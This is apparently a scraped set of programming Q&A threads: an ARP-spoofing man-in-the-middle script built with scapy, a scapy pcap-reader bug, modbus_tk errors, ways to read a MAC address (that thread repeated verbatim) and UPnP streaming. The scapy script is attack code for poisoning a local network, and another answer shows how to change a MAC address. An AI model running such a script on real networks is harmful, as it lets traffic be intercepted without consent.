I am using scapy for a simple MITM attack script (I am using it for educational perposes only of course), and I got this strange error which says : WARNING: No libpcap provider available ! pcap won't be used. I tryied looking this error up online but no one realy answered it. What does this error mean? Is it possible that I am just not using the script correctly? Any help vould be appreciated.
Here is my script:
import scapy.all as scapy
def get_target_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst= 'ff:ff:ff:ff:ff:ff')
finalpacket = broadcast/arp_request
answer = scapy.srp(finalpacket, timeout=2, verbose=False)[0]
mac = answer[0][1].hwsrc
return(mac)
def restore(destination_ip, source_ip):
target_mac = get_target_mac(destination_ip)
source_mac = get_target_mac(source_ip)
packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=target_mac, pscr=source_ip, hwsrc = source_mac)
scapy.sendp(packet, verbose=False)
def spoof_arp(target_ip, spoofed_ip):
mac = get_target_mac(target_ip)
packet = scapy.ARP(op = 2, hwdst = target_ip, psrc=spoofed_ip)
scapy.sendp(packet, verbose=False)
def main():
try:
while True:
spoof_arp('router_ip', 'fake_ip')#I hided the real ip
spoof_arp('fake_ip', 'router_ip')
except KeyboardInterrupt:
restore('router_ip', 'fake_ip')
restore('fake_ip', 'router_ip')
exit(0)
I think that user16139739 give a possible solution. I got some problems with scapy, this being one of them, the stable has some know bugs which were corrected in the development version.
I did not install anything else, in my case perhaps I already used user16139739 solution before, but still get this error in some point and another with RawPcapReader, so I used the development version.
libpcap is a library for Unix, you need an alternate (npcap) or windows compatible counterpart (WinPcap)
I was able to remedy the problem by installing Nmap (Network Packet Manipulation Library for windows 10).
Related
I'm trying to create a program where I have to read a pcap file and then count the number of packets related to some IPs. I'm not used to program in Python but I have to use it because I'm using it on a Raspberry Pi and depending of the output I have to control several pins.
Right now I have this, but I have an error and I don´t know how to solve it.
from scapy.all import *
from scapy.utils import RawPcapReader
from scapy.layers.l2 import Ether
from scapy.layers.inet import IP, TCP
def read_pcap(name_pcap):
print("Opening", name_pcap)
client_1 = '192.168.4.4:48878'
server = '10.0.0.2:80'
(client_1_ip, client_1_port) = client_1.split(':')
(server_ip, server_port) = server.split(':')
counter = 0
for(pkt_data, pkt_metadata,) in RawPcapReader(name_pcap):
counter += 1
ether_pkt = Ether(pkt_data)
# Below here are functions to filter the data
read_pcap("captura.pcap")
And the error is this one:
NameError: name 'Packet' is not defined
The error apears to be in this (for(pkt_data, pkt_metadata,) in RawPcapReader(name_pcap):) line.
Someone knows how to solve it?
Thnak you :)
As Carcigenicate pointed out, that's a known bug. It's fixed in https://github.com/secdev/scapy/commit/ff644181d9bee35979a84671690d8cd1aa1971fa
You can use the development version (over https://scapy.readthedocs.io/en/latest/installation.html#current-development-version) in the meantime
Uninstall previous version & Install Latest version from https://pypi.org/project/scapy/
pip install scapy==2.5.0rc1
This should fix the error
I'm currently trying to develop an application that uses the Modbus-RTU protocol, and I have to use modbus_tk in Python 2.7.
I'm supposed to use bits of code from another application which is able to communicate with the micro-controller via modbus. It works on that app when I run the following code, but I get an error when I run the same lines in my app.
import modbus_tk
import modbus_tk.defines as cst
import modbus_tk.modbus_rtu as modbus_rtu
import serial
MB_Add_Status = 8 + 5001
def MB_GetStatus(MB_Master_handle):
try:
status = MB_Master_handle.execute(1, cst.READ_HOLDING_REGISTERS, MB_Add_Status, 1)
return status
except modbus_tk.modbus.ModbusError, e:
logger.error("%s- Code=%d" % (e, e.get_exception_code()))
MB_port = 3
masterMB = modbus_rtu.RtuMaster(serial.Serial(port='COM'+str(MB_port), baudrate=19200, bytesize=8, parity='N', stopbits=2, xonxoff=0))
status = MB_GetStatus(masterMB)
First I needed to delete the arguments baudrate, bytesize, etc. in the constructor call because it rose an error like :
TypeError: __init__() got an unexpected keyword argument 'stopbits'
But then when we get to the call to execute, there is an error again, which I couldn't solve yet :
modbus_tk.modbus.ModbusInvalidResponseError: Response length is invalid 0
The only documentation I found is: https://github.com/Nobatek/modbus-tk/tree/master/docs, but I couldn't quite understand much of it. If someone could first explain me what this error really means, and where I should look, this would be highly appreciated. Thank you very much !
The right repository for this library is https://github.com/ljean/modbus-tk
It requires PySerial 2.7
Found it !
I updated the library and set the parameters of the constructor correctly. This works fine know.
I need a cross platform method of determining the MAC address of a computer at run time. For windows the 'wmi' module can be used and the only method under Linux I could find was to run ifconfig and run a regex across its output. I don't like using a package that only works on one OS, and parsing the output of another program doesn't seem very elegant not to mention error prone.
Does anyone know a cross platform method (windows and linux) method to get the MAC address? If not, does anyone know any more elegant methods then those I listed above?
Python 2.5 includes an uuid implementation which (in at least one version) needs the mac address. You can import the mac finding function into your own code easily:
from uuid import getnode as get_mac
mac = get_mac()
The return value is the mac address as 48 bit integer.
The pure python solution for this problem under Linux to get the MAC for a specific local interface, originally posted as a comment by vishnubob and improved by on Ben Mackey in this activestate recipe
#!/usr/bin/python
import fcntl, socket, struct
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
print getHwAddr('eth0')
This is the Python 3 compatible code:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import fcntl
import socket
import struct
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(ifname, 'utf-8')[:15]))
return ':'.join('%02x' % b for b in info[18:24])
def main():
print(getHwAddr('enp0s8'))
if __name__ == "__main__":
main()
netifaces is a good module to use for getting the mac address (and other addresses). It's crossplatform and makes a bit more sense than using socket or uuid.
import netifaces
netifaces.interfaces()
# ['lo', 'eth0', 'tun2']
netifaces.ifaddresses('eth0')[netifaces.AF_LINK]
# [{'addr': '08:00:27:50:f2:51', 'broadcast': 'ff:ff:ff:ff:ff:ff'}]
pypi location
Good Intro to netifaces
Sometimes we have more than one net interface.
A simple method to find out the mac address of a specific interface, is:
def getmac(interface):
try:
mac = open('/sys/class/net/'+interface+'/address').readline()
except:
mac = "00:00:00:00:00:00"
return mac[0:17]
to call the method is simple
myMAC = getmac("wlan0")
One other thing that you should note is that uuid.getnode() can fake the MAC addr by returning a random 48-bit number which may not be what you are expecting. Also, there's no explicit indication that the MAC address has been faked, but you could detect it by calling getnode() twice and seeing if the result varies. If the same value is returned by both calls, you have the MAC address, otherwise you are getting a faked address.
>>> print uuid.getnode.__doc__
Get the hardware address as a 48-bit positive integer.
The first time this runs, it may launch a separate program, which could
be quite slow. If all attempts to obtain the hardware address fail, we
choose a random 48-bit number with its eighth bit set to 1 as recommended
in RFC 4122.
Using my answer from here: https://stackoverflow.com/a/18031868/2362361
It would be important to know to which iface you want the MAC for since many can exist (bluetooth, several nics, etc.).
This does the job when you know the IP of the iface you need the MAC for, using netifaces (available in PyPI):
import netifaces as nif
def mac_for_ip(ip):
'Returns a list of MACs for interfaces that have given IP, returns None if not found'
for i in nif.interfaces():
addrs = nif.ifaddresses(i)
try:
if_mac = addrs[nif.AF_LINK][0]['addr']
if_ip = addrs[nif.AF_INET][0]['addr']
except IndexError, KeyError: #ignore ifaces that dont have MAC or IP
if_mac = if_ip = None
if if_ip == ip:
return if_mac
return None
Testing:
>>> mac_for_ip('169.254.90.191')
'2c:41:38:0a:94:8b'
You can do this with psutil which is cross-platform:
import psutil
nics = psutil.net_if_addrs()
print [j.address for j in nics[i] for i in nics if i!="lo" and j.family==17]
The cross-platform getmac package will work for this, if you don't mind taking on a dependency. It works with Python 2.7+ and 3.4+. It will try many different methods until either getting a address or returning None.
from getmac import get_mac_address
eth_mac = get_mac_address(interface="eth0")
win_mac = get_mac_address(interface="Ethernet 3")
ip_mac = get_mac_address(ip="192.168.0.1")
ip6_mac = get_mac_address(ip6="::1")
host_mac = get_mac_address(hostname="localhost")
updated_mac = get_mac_address(ip="10.0.0.1", network_request=True)
Disclaimer: I am the author of the package.
Update (Jan 14 2019): the package now only supports Python 2.7+ and 3.4+. You can still use an older version of the package if you need to work with an older Python (2.5, 2.6, 3.2, 3.3).
Note that you can build your own cross-platform library in python using conditional imports. e.g.
import platform
if platform.system() == 'Linux':
import LinuxMac
mac_address = LinuxMac.get_mac_address()
elif platform.system() == 'Windows':
# etc
This will allow you to use os.system calls or platform-specific libraries.
To get the eth0 interface MAC address,
import psutil
nics = psutil.net_if_addrs()['eth0']
for interface in nics:
if interface.family == 17:
print(interface.address)
nice actually return a dictionary within the dictionary it returns a list and within the list, it returns a staple. but nics['Ethernet'][0].address iteration solve the problem.
import psutil
nics = psutil.net_if_addrs()
mac_address = nics['Ethernet'][0].address
print(mac_address)
This cross-platform code does not 100% work on Windows. This works on Windows:
import psutil
print([(k, addr.address) for k, v in psutil.net_if_addrs().items() for addr in v if addr.family == -1])
Example:
[
('Local Area Connection', '01-23-45-67-89-0A'),
('Wireless Network Connection', '23-45-67-89-0A-BC'),
('Bluetooth Network Connection', '45-67-89-0A-BC-DE'),
('isatap.{01ABCDEF-0123-4567-890A-0123456789AB}', '00-00-00-00-00-00-00-01')
]
I dont know of a unified way, but heres something that you might find useful:
http://www.codeguru.com/Cpp/I-N/network/networkinformation/article.php/c5451
What I would do in this case would be to wrap these up into a function, and based on the OS it would run the proper command, parse as required and return only the MAC address formatted as you want. Its ofcourse all the same, except that you only have to do it once, and it looks cleaner from the main code.
Alternatively,
import uuid
mac_id=(':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff)
For Linux let me introduce a shell script that will show the mac address and allows to change it (MAC sniffing).
ifconfig eth0 | grep HWaddr |cut -dH -f2|cut -d\ -f2
00:26:6c:df:c3:95
Cut arguements may dffer (I am not an expert) try:
ifconfig etho | grep HWaddr
eth0 Link encap:Ethernet HWaddr 00:26:6c:df:c3:95
To change MAC we may do:
ifconfig eth0 down
ifconfig eth0 hw ether 00:80:48:BA:d1:30
ifconfig eth0 up
will change mac address to 00:80:48:BA:d1:30 (temporarily, will restore to actual one upon reboot).
For Linux you can retrieve the MAC address using a SIOCGIFHWADDR ioctl.
struct ifreq ifr;
uint8_t macaddr[6];
if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP)) < 0)
return -1;
strcpy(ifr.ifr_name, "eth0");
if (ioctl(s, SIOCGIFHWADDR, (void *)&ifr) == 0) {
if (ifr.ifr_hwaddr.sa_family == ARPHRD_ETHER) {
memcpy(macaddr, ifr.ifr_hwaddr.sa_data, 6);
return 0;
... etc ...
You've tagged the question "python". I don't know of an existing Python module to get this information. You could use ctypes to call the ioctl directly.
After looking for some time to a solution for streaming audio/video via uPnP, Coherence seems to be the most promising option: For example: http://coherence.beebits.net/browser/trunk/Coherence/coherence/backends/gstreamer_renderer.py seems to be what would be required to play a file directly to a HDMI TV dongle.
Oddly enough, after installing the Ubuntu coherence package, running import coherence in Python terminal doesn't really show anything like this module. Tab completion in bpython shows:
>>> coherence.
┌───────────────────────────────────────────────────────────────────────────┐
│SERVER_ID Version platform │
│sys twisted_version twisted_web_version │
└───────────────────────────────────────────────────────────────────────────┘
and those submodules seem to just give info about the system. How do I import and use Coherence to stream the desktop, or a video, to a uPnP screen? Is there a basic getting started guide?
Update
It looks like GUPnP has ability to link in to Python:
>>> from gi.repository import GUPnP
>>> GUPnP.ControlPoint.new()
Traceback (most recent call last):
File "<input>", line 1, in <module>
TypeError: new() takes exactly 2 arguments (0 given)
Which is apparently calling the function documented here:
https://developer.gnome.org/gupnp/unstable/GUPnPControlPoint.html
Unfortunately the docs don't have any full examples of how to stream to a video receiver - specifically, how does it initiate sending the video file over the network?
Update: This is the first step I use to detect the device:
import socket
import threading
import time
Addr = None;
StartLock = threading.Lock()
def DoUDP():
global Addr
global StartLock
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Internet, UDP
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while 1:
s.sendto('0:0',('192.168.0.255',63630))
data,addr = s.recvfrom(1024)
print data
print 'from', addr
Addr = addr
try:
StartLock.release()
except:
pass
time.sleep(1)
return
StartLock.acquire()
print 'starting...'
udpthread = threading.Thread(target=DoUDP)
udpthread.start();
#... knowing address of the device... send stuff?
About GUPnP on python: it's not extensively used and definitely not documented well enough but it should work. Here's a quick example of listing the available devices on wlan0 network using a GUPnP ControlPoint:
from gi.repository import GLib, GUPnP
def device_available (cp, proxy):
print ("Found " + proxy.get_friendly_name ())
ctx = GUPnP.Context.new (None, "wlan0", 0)
cp = GUPnP.ControlPoint.new (ctx, "upnp:rootdevice")
cp.set_active (True)
cp.connect ("device-proxy-available", device_available)
GLib.MainLoop ().run ()
The problem with "streaming to a renderer" is that you actually need two things: the control point that tells the renderer what you want to play, and the mediaserver that serves the actual media when the renderer asks for it -- if these are integrated into one (called the "2-box push model"), the mediaserver part is not quite as complex but it still needs to be done.
One project you may be interested in is dleyna: It is based on GUPnP and tries to make this client side work a little easier. See Jens' article and documentation for PushHost. However dleyna is a set of D-Bus services, not a library so you'll have to decide if it fits your purposes.
Alternatively you can of course have a normal mediaserver (like rygel) running and use a control point (like gupnp-av-cp from gupnp-tools) to select the media you want to play and the renderer that should play it.
I need a cross platform method of determining the MAC address of a computer at run time. For windows the 'wmi' module can be used and the only method under Linux I could find was to run ifconfig and run a regex across its output. I don't like using a package that only works on one OS, and parsing the output of another program doesn't seem very elegant not to mention error prone.
Does anyone know a cross platform method (windows and linux) method to get the MAC address? If not, does anyone know any more elegant methods then those I listed above?
Python 2.5 includes an uuid implementation which (in at least one version) needs the mac address. You can import the mac finding function into your own code easily:
from uuid import getnode as get_mac
mac = get_mac()
The return value is the mac address as 48 bit integer.
The pure python solution for this problem under Linux to get the MAC for a specific local interface, originally posted as a comment by vishnubob and improved by on Ben Mackey in this activestate recipe
#!/usr/bin/python
import fcntl, socket, struct
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
print getHwAddr('eth0')
This is the Python 3 compatible code:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import fcntl
import socket
import struct
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(ifname, 'utf-8')[:15]))
return ':'.join('%02x' % b for b in info[18:24])
def main():
print(getHwAddr('enp0s8'))
if __name__ == "__main__":
main()
netifaces is a good module to use for getting the mac address (and other addresses). It's crossplatform and makes a bit more sense than using socket or uuid.
import netifaces
netifaces.interfaces()
# ['lo', 'eth0', 'tun2']
netifaces.ifaddresses('eth0')[netifaces.AF_LINK]
# [{'addr': '08:00:27:50:f2:51', 'broadcast': 'ff:ff:ff:ff:ff:ff'}]
pypi location
Good Intro to netifaces
Sometimes we have more than one net interface.
A simple method to find out the mac address of a specific interface, is:
def getmac(interface):
try:
mac = open('/sys/class/net/'+interface+'/address').readline()
except:
mac = "00:00:00:00:00:00"
return mac[0:17]
to call the method is simple
myMAC = getmac("wlan0")
One other thing that you should note is that uuid.getnode() can fake the MAC addr by returning a random 48-bit number which may not be what you are expecting. Also, there's no explicit indication that the MAC address has been faked, but you could detect it by calling getnode() twice and seeing if the result varies. If the same value is returned by both calls, you have the MAC address, otherwise you are getting a faked address.
>>> print uuid.getnode.__doc__
Get the hardware address as a 48-bit positive integer.
The first time this runs, it may launch a separate program, which could
be quite slow. If all attempts to obtain the hardware address fail, we
choose a random 48-bit number with its eighth bit set to 1 as recommended
in RFC 4122.
Using my answer from here: https://stackoverflow.com/a/18031868/2362361
It would be important to know to which iface you want the MAC for since many can exist (bluetooth, several nics, etc.).
This does the job when you know the IP of the iface you need the MAC for, using netifaces (available in PyPI):
import netifaces as nif
def mac_for_ip(ip):
'Returns a list of MACs for interfaces that have given IP, returns None if not found'
for i in nif.interfaces():
addrs = nif.ifaddresses(i)
try:
if_mac = addrs[nif.AF_LINK][0]['addr']
if_ip = addrs[nif.AF_INET][0]['addr']
except IndexError, KeyError: #ignore ifaces that dont have MAC or IP
if_mac = if_ip = None
if if_ip == ip:
return if_mac
return None
Testing:
>>> mac_for_ip('169.254.90.191')
'2c:41:38:0a:94:8b'
You can do this with psutil which is cross-platform:
import psutil
nics = psutil.net_if_addrs()
print [j.address for j in nics[i] for i in nics if i!="lo" and j.family==17]
The cross-platform getmac package will work for this, if you don't mind taking on a dependency. It works with Python 2.7+ and 3.4+. It will try many different methods until either getting a address or returning None.
from getmac import get_mac_address
eth_mac = get_mac_address(interface="eth0")
win_mac = get_mac_address(interface="Ethernet 3")
ip_mac = get_mac_address(ip="192.168.0.1")
ip6_mac = get_mac_address(ip6="::1")
host_mac = get_mac_address(hostname="localhost")
updated_mac = get_mac_address(ip="10.0.0.1", network_request=True)
Disclaimer: I am the author of the package.
Update (Jan 14 2019): the package now only supports Python 2.7+ and 3.4+. You can still use an older version of the package if you need to work with an older Python (2.5, 2.6, 3.2, 3.3).
Note that you can build your own cross-platform library in python using conditional imports. e.g.
import platform
if platform.system() == 'Linux':
import LinuxMac
mac_address = LinuxMac.get_mac_address()
elif platform.system() == 'Windows':
# etc
This will allow you to use os.system calls or platform-specific libraries.
To get the eth0 interface MAC address,
import psutil
nics = psutil.net_if_addrs()['eth0']
for interface in nics:
if interface.family == 17:
print(interface.address)
nice actually return a dictionary within the dictionary it returns a list and within the list, it returns a staple. but nics['Ethernet'][0].address iteration solve the problem.
import psutil
nics = psutil.net_if_addrs()
mac_address = nics['Ethernet'][0].address
print(mac_address)
This cross-platform code does not 100% work on Windows. This works on Windows:
import psutil
print([(k, addr.address) for k, v in psutil.net_if_addrs().items() for addr in v if addr.family == -1])
Example:
[
('Local Area Connection', '01-23-45-67-89-0A'),
('Wireless Network Connection', '23-45-67-89-0A-BC'),
('Bluetooth Network Connection', '45-67-89-0A-BC-DE'),
('isatap.{01ABCDEF-0123-4567-890A-0123456789AB}', '00-00-00-00-00-00-00-01')
]
I dont know of a unified way, but heres something that you might find useful:
http://www.codeguru.com/Cpp/I-N/network/networkinformation/article.php/c5451
What I would do in this case would be to wrap these up into a function, and based on the OS it would run the proper command, parse as required and return only the MAC address formatted as you want. Its ofcourse all the same, except that you only have to do it once, and it looks cleaner from the main code.
Alternatively,
import uuid
mac_id=(':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff)
For Linux let me introduce a shell script that will show the mac address and allows to change it (MAC sniffing).
ifconfig eth0 | grep HWaddr |cut -dH -f2|cut -d\ -f2
00:26:6c:df:c3:95
Cut arguements may dffer (I am not an expert) try:
ifconfig etho | grep HWaddr
eth0 Link encap:Ethernet HWaddr 00:26:6c:df:c3:95
To change MAC we may do:
ifconfig eth0 down
ifconfig eth0 hw ether 00:80:48:BA:d1:30
ifconfig eth0 up
will change mac address to 00:80:48:BA:d1:30 (temporarily, will restore to actual one upon reboot).
For Linux you can retrieve the MAC address using a SIOCGIFHWADDR ioctl.
struct ifreq ifr;
uint8_t macaddr[6];
if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP)) < 0)
return -1;
strcpy(ifr.ifr_name, "eth0");
if (ioctl(s, SIOCGIFHWADDR, (void *)&ifr) == 0) {
if (ifr.ifr_hwaddr.sa_family == ARPHRD_ETHER) {
memcpy(macaddr, ifr.ifr_hwaddr.sa_data, 6);
return 0;
... etc ...
You've tagged the question "python". I don't know of an existing Python module to get this information. You could use ctypes to call the ioctl directly.